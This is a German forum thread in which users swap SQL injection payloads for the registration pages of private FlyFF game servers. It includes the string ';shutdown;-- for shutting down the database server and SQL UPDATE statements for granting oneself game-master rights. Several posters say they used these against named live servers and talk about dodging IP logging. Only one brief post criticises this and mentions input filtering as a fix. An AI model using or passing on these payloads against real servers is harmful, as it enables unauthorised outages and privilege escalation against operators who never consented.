[HowTo]Account_DBF auf einen anderen Server löschen
-
-
Werbung zur Unterstützung des Forums ( Bitte AddBlocker deaktivieren )
Quellcode
- Warning Message
- An error was detected which prevented the loading of this page. If this problem persists, please contact the website administrator.
- C:/AppServ/www/system/libraries/drivers/Database/Mssql.php [66]:
- mssql_connect() [function.mssql-connect]: Unable to connect to server: WIN-D6FX2HCT6ZG\FLYFORFANTASY915
- Loaded in 10.6967 seconds, using 1.75MB of memory. Generated by Kohana v2.3.4.
wie nice
das steht auf der homepage XD von flyforfantasy XD[COLOR="White"]lol hab garnich gedacht das es auf fantasy geht o.o[/COLOR]auf dragon crusade geht ned...-.-
kA warum hilft mal jemand pls.^^
Er erstellt denn account und so aber es wird nichts gelöscht
warum??
~Yuri
';shutdown;-- <--- geht auch habs geteste^^[COLOR="Cyan"]Sowas ist wirklich erbärmlich <.<
Aber naja zum fixen relativ einfach
sonderzeichen raus
Sämmtliche Commands blocken
fertig <.<
aber sowas ist ERBÄRMLICH[/COLOR]lol darf man kein Spaß haben? ö.Ö xDIch kenn mich zwar nicht genau mit sql-injections aus, aber die sind wirklich sowasvon simpel und es wundert mich überhauptnicht, dass die von Dragoncrusade geblockt werden. Das klappt nur mit wirklichen Voll-Noob-ServernUm einen GM Account zu machen führe diesen Befehl aus:
USE [CHARACTER_01_DBF]
UPDATE CHARACTER_TBL SET m_chAuthority='Z'
WHERE m_szName='Dein Charname' and serverindex='01'
USE [ACCOUNT_DBF]
UPDATE ACCOUNT_TBL_DETAIL SET m_chLoginAuthority='Z'
WHERE account='Deine Account ID' and gamecode='A000'[FONT="Trebuchet MS"][COLOR="LemonChiffon"][SIZE="2"]Aber da muss schon ein Account bestehen durch eine Injection könnnte man auch GM-Rechte entziehen ^^[/SIZE][/COLOR][/FONT]Auf FlyForFantasy gehts habs gemacht
auf flying-angelz auch haben reg seite rausgenommen
oldschoolflyff auch reg seite rausgenommen...
tuneupfly auch reg seite rausgenommen xDEuch ist aber bewusst das es auch schön rger geben kann, da bei den meisten scripts die ip gespeichert wird.Und? Dann benutzen wir nen Script und ändern die IP XD[COLOR="Cyan"]Naja wie wollt ihr die IP ändern wenn ihr weder die Datenbank noch die Tabelle noch die Spalte noch die Verbindungsart kennt?
Mangekyo benutzt eine Mysql verbindung um die IP´s zu loggen[/COLOR]Und? Solln die doch XD
Mann kann es ja versuchen indem man in seiner eigenen Datenbank nach guckt.
Insovern man eine hatAuf flyforfantasy gehts noch :D
Hab mich grad mit ';shutdown;-- registriert und Hp war down :D
Ist ';shutdown;-- eig. dazu da um den root runterzufahren?Nein nur um Mssql zu disconnecten!
Und ich versuche gleich meinen Char zum GM zu machen XDWas muss man denn als Accountnamen eingeben um gmrechte zu haben?
Und ist Pw egal?Du benötigst ein ganz normalen Account mit Char.
In dem Script gibste dann halt einfach an wie dein Accountid ist und wie dein Charname ist und dann bekommste die rechte!Und wie ist der script?USE [CHARACTER_01_DBF]
UPDATE CHARACTER_TBL SET m_chAuthority='Z'
WHERE m_szName='Dein Charname' and serverindex='01'
USE [ACCOUNT_DBF]
UPDATE ACCOUNT_TBL_DETAIL SET m_chLoginAuthority='Z'
WHERE account='Deine Account ID' and gamecode='A000'-
Teilen
- Facebook 0
- Twitter 0
- Google Plus 0
- Reddit 0